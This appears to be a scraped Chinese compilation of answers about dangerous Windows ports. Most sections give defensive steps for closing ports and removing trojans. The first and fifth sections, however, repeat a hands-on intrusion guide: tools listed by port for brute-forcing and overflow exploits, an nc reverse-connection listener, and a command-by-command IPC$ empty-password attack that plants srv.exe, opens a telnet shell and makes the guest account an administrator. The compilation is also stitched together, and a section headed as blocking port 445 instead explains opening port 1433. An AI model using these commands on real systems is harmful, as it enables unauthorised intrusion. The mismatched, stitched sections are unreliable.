1.计算机有多少端口
默认情况下,Windows有很多端口是开放的,在你上网的时候,网络病毒和黑客可以通过这些端口连上你的电脑。
为了让你的系统变为铜墙铁壁,应该封闭这些端口,主要有:TCP135、139、445、593、1025 端口和UDP135、137、138、445端口,一些流行病毒的后门端口(如 TCP 2745、3127、6129 端口),以及远程服务访问端口3389。下面介绍如何在WinXP/2000/2003下关闭这些网络端口: 第一步,点击“开始”菜单/设置/控制面板/管理工具,双击打开“本地安全策略”,选中“IP安全策略,在本地计算机”,在右边窗格的空白位置右击鼠标,弹出快捷菜单,选择“创建IP安全策略”,于是弹出一个向导。
在向导中点击“下一步”按钮,为新的安全策略命名;再按“下一步”,则显示“安全通信请求”画面,在画面上把“激活默认相应规则”左边的钩去掉,点击“完成”按钮就创建了一个新的IP安全策略。 第二步,右击该IP安全策略,在“属性”对话框中,把“使用添加向导”左边的钩去掉,然后单击“添加”按钮添加新的规则,随后弹出“新规则属性”对话框,在画面上点击“添加”按钮,弹出IP筛选器列表窗口;在列表中,首先把“使用添加向导”左边的钩去掉,然后再点击右边的“添加”按钮添加新的筛选器。
第三步,进入“筛选器属性”对话框,首先看到的是寻址,源地址选“任何IP地址”,目标地址选“我的IP地址”;点击“协议”选项卡,在“选择协议类型”的下拉列表中选择“TCP”,然后在“到此端口”下的文本框中输入“135”,点击“确定”按钮,这样就添加了一个屏蔽TCP135(RPC)端口的筛选器,它可以防止外界通过135端口连上你的电脑。 点击“确定”后回到筛选器列表的对话框,可以看到已经添加了一条策略,重复以上步骤继续添加TCP137、139、445、593端口和UDP135、139、445端口,为它们建立相应的筛选器。
重复以上步骤添加TCP1025、2745、3127、6129、3389端口的屏蔽策略,建立好上述端口的筛选器,最后点击“确定”按钮。 第四步,在“新规则属性”对话框中,选择“新IP筛选器列表”,然后点击其左边的圆圈上加一个点,表示已经激活,最后点击“筛选器操作”选项卡。
在“筛选器操作”选项卡中,把“使用添加向导”左边的钩去掉,点击“添加”按钮,添加“阻止”操作:在“新筛选器操作属性”的“安全措施”选项卡中,选择“阻止”,然后点击“确定”按钮。 第五步、进入“新规则属性”对话框,点击“新筛选器操作”,其左边的圆圈会加了一个点,表示已经激活,点击“关闭”按钮,关闭对话框;最后回到“新IP安全策略属性”对话框,在“新的IP筛选器列表”左边打钩,按“确定”按钮关闭对话框。
在“本地安全策略”窗口,用鼠标右击新添加的IP安全策略,然后选择“指派”。 于是重新启动后,电脑中上述网络端口就被关闭了,病毒和黑客再也不能连上这些端口,从而保护了你的电脑。
1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后 SQLTools.exe入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 2. 4899端口入侵 用4899过滤器.exe,扫描空口令的机器 3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。
(tscrack.exe) 4. 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。 5. serv-u入侵(21端口) 对5. 004及以下系统,可用溢出入侵。
(serv5004.exe) 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 对serv-u的MD5加密密码,可以用字典暴破。
(crack.vbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码 6. 554端口 用real554.exe入侵。 7. 6129端口 用DameWare6129.exe入侵。
8. 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 9. 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。
(可用mydoomscan.exe查)。 10. 其他入侵 利用shanlu的入侵软件入侵 经典IPC$入侵 1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators" 这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连 接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名 ,输入administrators,命令即可成功完成。
2. C:\>copy srv.exe $">\\127.0.0.1\admin$ 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的 c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。 3. C:\>net time \\127.0.0.1 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00。
2.如何关闭windows 10 的135 137 139 445等危险端口
关闭135 1、运行 输入“dcomcnfg”
2、在“计算机”选项右边,右键单击“我的电脑”,选择“属性”。
3、在出现的“我的电脑属性”对话框“默认属性”选项卡中,去掉“在此计算机上启用分布式COM”前的勾。
4、选择“默认协议”选项卡,选中“面向连接的TCP/IP”,单击“删除”按钮
关闭136137138端口
在网络邻居上点右键选属性,在新建好的连接上点右键选属性再选择网络选项卡,去掉Microsoft网络的文件和打印机共享,和Microsoft网络客户端的复选框。这样就关闭了共享端137和138还有136端口
关闭139端口:139端口是NetBIOS Session端口,用来文件和打印共享,注意的是运行samba的unix机器也开放了139端口,功能一样。关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性,进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的 NETBIOS”,打勾就关闭了139端口
关闭445端口:开始-运行输入regedit.确定后定位到
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servi ces\NetBT\Parameters,新建名为“SMBDeviceEnabled”的DWORD值,并将其设置为0
3.电脑有哪些端口是危险的
为了让你的系统变为铜墙铁壁,应该封闭这些端口,主要有:TCP 135、139、445、593、1025 端口和 UDP 135、137、138、445 端口,一些流行病毒的后门端口(如 TCP 2745、3127、6129 端口),以及远程服务访问端口3389 113端口木马的清除(仅适用于windows系统): 这是一个基于irc聊天室控制的木马程序。
1.首先使用netstat -an命令确定自己的系统上是否开放了113端口 2.使用fport命令察看出是哪个程序在监听113端口 fport工具下载 例如我们用fport看到如下结果: Pid Process Port Proto Path 392 svchost -> 113 TCP C:\\WINNT\\system32\\vhos.exe 我们就可以确定在监听在113端口的木马程序是vhos.exe而该程序所在的路径为 c:\\winnt\\system32下。 3.确定了木马程序名(就是监听113端口的程序)后,在任务管理器中查找到该进程, 并使用管理器结束该进程。
4.在开始-运行中键入regedit运行注册表管理程序,在注册表里查找刚才找到那个程序, 并将相关的键值全部删掉。 5.到木马程序所在的目录下删除该木马程序。
(通常木马还会包括其他一些程序,如 rscan.exe、psexec.exe、ipcpass.dic、ipcscan.txt等,根据 木马程序不同,文件也有所不同,你可以通过察看程序的生成和修改的时间来确定与 监听113端口的木马程序有关的其他程序) 6.重新启动机器。 3389端口的关闭: 首先说明3389端口是windows的远程管理终端所开的端口,它并不是一个木马程序,请先 确定该服务是否是你自己开放的。
如果不是必须的,请关闭该服务。 win2000关闭的方法: win2000server 开始-->程序-->管理工具-->服务里找到Terminal Services服务项, 选中属性选项将启动类型改成手动,并停止该服务。
win2000pro 开始-->设置-->控制面板-->管理工具-->服务里找到Terminal Services 服务项,选中属性选项将启动类型改成手动,并停止该服务。 winxp关闭的方法: 在我的电脑上点右键选属性-->远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。
4899端口的关闭: 首先说明4899端口是一个远程控制软件(remote administrator)服务端监听的端口,他不能 算是一个木马程序,但是具有远程控制功能,通常杀毒软件是无法查出它来的,请先确定该服 务是否是你自己开放并且是必需的。如果不是请关闭它。
关闭4899端口: 请在开始-->运行中输入cmd(98以下为command),然后cd C:\\winnt\\system32(你的系统 安装目录),输入r_server.exe /stop后按回车。 然后在输入r_server /uninstall /silence 到C:\\winnt\\system32(系统目录)下删除r_server.exe admdll.dll radbrv.dll三个文件 5800,5900端口: 1.首先使用fport命令确定出监听在5800和5900端口的程序所在位置(通常会是c:\\winnt\\fonts\\ explorer.exe) 2.在任务管理器中杀掉相关的进程(注意有一个是系统本身正常的,请注意!如果错杀可以重新 运行c:\\winnt\\explorer.exe) 3.删除C:\\winnt\\fonts\\中的explorer.exe程序。
4.删除注册表HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run中的 Explorer项。 5.重新启动机器。
6129端口的关闭: 首先说明6129端口是一个远程控制软件(dameware nt utilities)服务端监听得端口,他不是 一个木马程序,但是具有远程控制功能,通常的杀毒软件是无法查出它来的。请先确定该服务 是否是你自己安装并且是必需的,如果不是请关闭。
关闭6129端口: 选择开始-->设置-->控制面板-->管理工具-->服务 找到DameWare Mini Remote Control项点击右键选择属性选项,将启动类型改成禁用后 停止该服务。 到c:\\winnt\\system32(系统目录)下将DWRCS.EXE程序删除。
到注册表内将HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\DWMRCS表项删除。 1029端口和20168端口: 这两个端口是lovgate蠕虫所开放的后门端口。
蠕虫相关信息请参见:Lovgate蠕虫: /2005-07/20050726013555.htm。
4.勒索病毒容易入侵win10哪些端口
网络安全专家建议,用户要断网开机,即先拔掉网线再开机,这样基本可以避免被勒索软件感染。开机后应尽快想办法打上安全补丁,或安装各家网络安全公司针对此事推出的防御工具,才可以联网。建议尽快备份电脑中的重要文件资料到移动硬盘、U 盘,备份完后脱机保存该磁盘,同时对于不明链接、文件和邮件要提高警惕,加强防范。
临时解决方案:
1、开启系统防火墙
2、利用系统防火墙高级设置阻止向445端口进行连接(该操作会影响使用445端口的服务)
3、打开系统自动更新,并检测更新进行安装
Win7、Win8、Win10的处理流程
1、打开控制面板-系统与安全-Windows防火墙,点击左侧启动或关闭Windows防火墙。
2、选择启动防火墙,并点击确定
3、点击高级设置
4、点击入站规则,新建规则
5、选择端口,下一步
6、特定本地端口,输入445,下一步
7、选择阻止连接,下一步
8、配置文件,全选,下一步
9、名称,可以任意输入,完成即可。
XP系统的处理流程
1、依次打开控制面板,安全中心,Windows防火墙,选择启用
2、点击开始,运行,输入cmd,确定执行下面三条命令:net stop rdr 、net stop srv 、net stop netbt
5.哪些端口有危险..可以干什么
1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后 SQLTools.exe入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 2. 4899端口入侵 用4899过滤器.exe,扫描空口令的机器 3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。(tscrack.exe) 4. 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。
5. serv-u入侵(21端口) 对5. 004及以下系统,可用溢出入侵。(serv5004.exe) 对5.1.0.0及以下系统,可用本地提升权限。
(servlocal.exe) 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码 6. 554端口 用real554.exe入侵。
7. 6129端口 用DameWare6129.exe入侵。 8. 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。
9. 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵 利用shanlu的入侵软件入侵 经典IPC$入侵 1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators" 这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连 接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名 ,输入administrators,命令即可成功完成。 2. C:\>copy srv.exe $">\\127.0.0.1\admin$ 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的 c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\>net time \\127.0.0.1 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。 4. C:\>at \\127.0.0.1 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊. 5. C:\>net time \\127.0.0.1 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备 开始下面的命令。
6. C:\>telnet 127.0.0.1 99 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的 是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打 算建立一个Telnet服务!这就要用到ntlm了 7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$ 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。 8. C:\WINNT\system32>ntlm 输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这 个程序在对方计算机上运行)。
当出现"DONE"的时候,就说明已经启动正常。然后使 用"net start telnet"来开启Telnet服务! 9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作 一样简单! 为了以防万一,我们再把guest激活加到管理组 10. C:\>net user guest /active:yes 将对方的Guest用户激活 11. C:\>net user guest 1234 将Guest的密码改为1234,或者你要设定的密码 12. C:\>net localgroup administrators guest /add 将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次可以用guest再次访问这台计算机)。
6.如何封禁445危险端口
win7开启1433端口的步骤:
1、点开始——控制面板;
2、点系统和安全;
3、点Windows防火墙;
4、点高级设置;
5、点入站规则,点新建规则;
注:入站规则:别人电脑访问自己电脑;
出站规则:自己电脑访问别人电脑。
6、选中端口,点下一步;
7、选中TCP;
选中特定本地端口:输入1433,点下一步;
8、选中允许连接,点下一步;
9、全部选中,点下一步;
10、输入端口名称,点完成;
11、然后选择出站规则,点新建规则,操作同上。
7.如何关闭windows 10 的135 137 139 445等危险端口
关闭135 1、运行 输入“dcomcnfg”2、在“计算机”选项右边,右键单击“我的电脑”,选择“属性”。
3、在出现的“我的电脑属性”对话框“默认属性”选项卡中,去掉“在此计算机上启用分布式COM”前的勾。4、选择“默认协议”选项卡,选中“面向连接的TCP/IP”,单击“删除”按钮关闭136137138端口在网络邻居上点右键选属性,在新建好的连接上点右键选属性再选择网络选项卡,去掉Microsoft网络的文件和打印机共享,和Microsoft网络客户端的复选框。
这样就关闭了共享端137和138还有136端口关闭139端口:139端口是NetBIOS Session端口,用来文件和打印共享,注意的是运行samba的unix机器也开放了139端口,功能一样。关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性,进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的 NETBIOS”,打勾就关闭了139端口关闭445端口:开始-运行输入regedit.确定后定位到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servi ces\NetBT\Parameters,新建名为“SMBDeviceEnabled”的DWORD值,并将其设置为0。
8.勒索病毒容易入侵win10哪些端口
大部分系统均起作用,win10也不例外,但win10的安全度比较高,比较安全!此次 永恒之蓝 勒索病毒事件大部分被入侵的都是低级系统,微软已经不提供安全更新的系统。
如果可以建议使用win10比较安全!但主要是要自己做好防御措施防御方法:1.不随意打开/点击/进入/下载安装 不明 网页/链接/网页/软件等(这是最基础的)2.更新安全软件至最新版本,专门应对此次事件的最新版本,要可靠的安全软件(推荐用360安全卫士)3.到微软官网下载最新补丁,或是用360下载最新的补丁!4.这段时间最好每天都木马查杀,漏洞检测。5.也是很重要的一点,把445端口(最重要的),135,137,138,139等危险端口都封闭,关闭方法自己百度,随便一查就会有(最好选择最近的发布文章)6.使用360反勒索服务7.准备好一块系统重装光盘或U盘,以防万一。
8.也要准备好360新更新的工具 文件解密 也是以防万一。9.这一点是最重要,最重要,最重要的,那就是 防火墙 必须要开,(是必须开,而不是可以开,也不是推荐开),不然即使你申请360反勒索赔理,他也绝对不会赔给你的10.如果不闲麻烦可以开机时断掉网线,开机用杀毒软件检查无异常后在重新连网。
9.安装Win10技术预览版有哪些风险
微软宣布了Windows 10,又放出了Windows 10技术预览版的下载,想必一些技术爱好者已经下载或正在下载了。在安装之前提醒大家,最好不要在工作用机上覆盖安装,毕竟它仍然是早期的测试版本,存在一些未知的问题,可能会意外崩溃、导致你的文件丢失。那么,安装Win10技术预览版究竟会有哪些风险呢?下面是笔者带来关于安装Win10技术预览版存在风险的情况说明。
安装Win10技术预览版有哪些风险?
关于安装Windows 10技术预览版的风险,微软官方表示,“此软件尚在开发中,可能会有一定风险。 这就是我们为什么建议你不得在主要的家用或商业电脑上安装该软件”。微软建议大家备份所有内容,因为很可能出现以下风险:
1,意外的电脑崩溃和文件丢失。
2,无法安装或无法正常运行软件,包括防病毒程序或安全程序。
3,打印机、视频卡或其他硬件无法工作。
4,访问公司或家庭网络遇到困难。
5,损坏某些文件。
另外,如果你的电脑出现问题,微软还很有可能会检查你的系统文件。如果你非常关注系统文件隐私,微软建议你考虑一下是否还要使用技术预览版,或者考虑使用其他的电脑。
后记:笔者认为安装Win10技术预览版目前只适合简单的了解,适合办公学习使用,对于一些从来没有安装过系统的用户来说,自己最好不要安装。请专业人士安装。
10.win10家庭版怎么禁用445端口
关闭Win10 445端口
这次勒索病毒利用了NSA黑客工具包中的“永恒之蓝”0day漏洞,通过电脑445端口(文件共享)在内网进行蠕虫式感染传播,为了防止内网感染,建议用户关闭Win10的445端口,具体操作方法如下。
1、首先打开Win10防火墙,然后点击进入左侧的“高级设置”
2、打开防火墙高级设置后,先点击左侧的“入站规则”,然后在点击右侧的“新建规则”
3、在新建规则设置中,依次选择“端口”下一步“TCP(UDP)”,并选择“特定本地端口”,然后输入端口名“445”,继续点击下一步
4、然后下一步,在“操作”选项中,选择“阻止连接”
5、最后在名称中命名为“禁用445端口”,之后点击“完成”即可
转载请注明出处windows之家 » Win10电脑有哪些危险端口